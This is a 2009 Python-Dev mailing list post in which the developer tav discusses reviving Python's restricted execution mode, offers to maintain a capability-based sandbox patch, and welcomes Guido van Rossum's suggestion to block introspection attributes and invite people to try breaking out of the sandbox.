[Python-Dev] Reviving restricted mode?

tav tav at espians.com
Sun Feb 22 22:22:27 CET 2009 

Hey guys,

  benjamin> Even if this patch manages to plug all the holes in the
  benjamin> current Python, do we really want to commit our
  benjamin> selves to maintaining it through language evolution
  benjamin> which will surely introduce new subtle ways to
  benjamin> circumvent the guard?

If it would be helpful, I am happy to maintain this as Python evolves.

I've already been maintaining the PJE-inspired ctypes-based approach
and monkeypatches for various Python versions for a while now. See
secure.py, secure25.py, secure26.py and secure30.py in:

  http://github.com/tav/plexnet/tree/9dabc570a2499689e773d1af3599a29102071f80/source/plexnet/util

Also, my plans for world domination depend on a secure Python, so I
have the necessary incentives ;p

  sameule> I don't have much time these days, for sure not
  samuele> until pycon us, to look at the proposed code.

Thanks in advance if/when you get the time for this Samuele!

  samuele> E provides and incorporate a lot of thinking
  samuele> around [snip]

The functions based approach I am taking is very much taken from E and
inspired by an insight that Ka-Ping Yee had on Python-Dev years ago.

See http://www.erights.org/elib/capability/ode/index.html for a direct
parallel to the approach I've taken...

  guido> For Tav's benefit, I think it would be good to at
  guido> least add "IsRestricted" checks to
  guido> __subclasses__(), gi_code and gi_frame --
  guido> that's a trivial patch and if he believes it's
  guido> enough he can create a sandbox on app engine
  guido> and invite people to try to break out of it... If
  guido> someone succeeds....

If someone succeeds...

...My missus might end up leaving me on account of so much crying ;p

Seriously though, it's a relatively risk-free approach. The only
person who stands to lose out is me if I'm wrong =)

In the worst case scenario, this approach would help identify other
"leak" attributes/methods -- which I'm hoping won't be found.

And, in an ideal scenario, we'd have the basis for secure Python
interpreter/programming... which, together with PyPy's sandboxed
interpreter, would seriously rock!

-- 
enthusiastically, tav

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian

More information about the Python-Dev mailing list